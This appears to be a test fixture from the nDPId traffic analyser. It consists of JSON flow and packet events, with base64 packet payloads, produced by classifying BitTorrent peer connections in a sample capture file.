+00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"} +01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"} +01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="} +00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="} +01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="} +01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="} +00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="} +01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARwAAAAFBAAAAdQAAAAFBAAAAFA="} +00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="} +01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME="} 